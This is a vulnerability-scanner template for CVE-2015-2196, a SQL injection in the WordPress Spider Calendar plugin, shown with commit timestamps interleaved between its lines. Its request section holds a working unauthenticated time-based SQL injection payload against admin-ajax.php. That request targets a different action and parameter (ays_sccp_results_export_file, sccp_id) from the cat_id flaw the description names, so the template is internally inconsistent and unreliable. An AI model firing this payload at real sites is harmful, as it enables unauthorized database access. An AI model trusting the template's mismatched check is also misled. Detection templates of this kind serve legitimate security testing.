2023-03-31 11:28:24 +00:00
id : CVE-2015-2196
info :
2023-04-12 17:30:24 +00:00
name : WordPress Spider Calendar <=1.4.9 - SQL Injection
2023-03-31 11:28:24 +00:00
author : theamanrawat
2023-07-11 19:49:27 +00:00
severity : high
2023-03-31 11:28:24 +00:00
description : |
2023-04-12 17:30:24 +00:00
WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
2023-09-06 13:22:34 +00:00
remediation : Fixed in version 1.4.14.
2023-03-31 11:28:24 +00:00
reference :
- https://wpscan.com/vulnerability/8d436356-37f8-455e-99b3-effe8d0e3cad
- https://wordpress.org/plugins/spider-event-calendar/
2023-03-31 16:11:22 +00:00
- http://www.exploit-db.com/exploits/36061
2023-04-12 17:30:24 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2015-2196
2023-03-31 11:28:24 +00:00
classification :
2023-07-11 19:49:27 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score : 7.5
2023-03-31 11:28:24 +00:00
cve-id : CVE-2015-2196
cwe-id : CWE-89
2023-07-11 19:49:27 +00:00
epss-score : 0.0093
2023-08-31 11:46:18 +00:00
epss-percentile : 0.81015
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:*
2023-03-31 11:28:24 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 13:22:34 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : web-dorado
product : spider_calendar
2023-09-06 13:22:34 +00:00
framework : wordpress
2023-03-31 22:40:57 +00:00
tags : wordpress,wp,sqli,cve2015,wpscan,wp-plugin,spider-event-calendar,unauth,edb,cve
2023-03-31 11:28:24 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-31 11:28:24 +00:00
- raw :
- |
@timeout 10s
GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
- 'duration_1>=6'
- 'status_code == 200'
- 'contains(body, "{\"status\":true,\"data\"")'
condition : and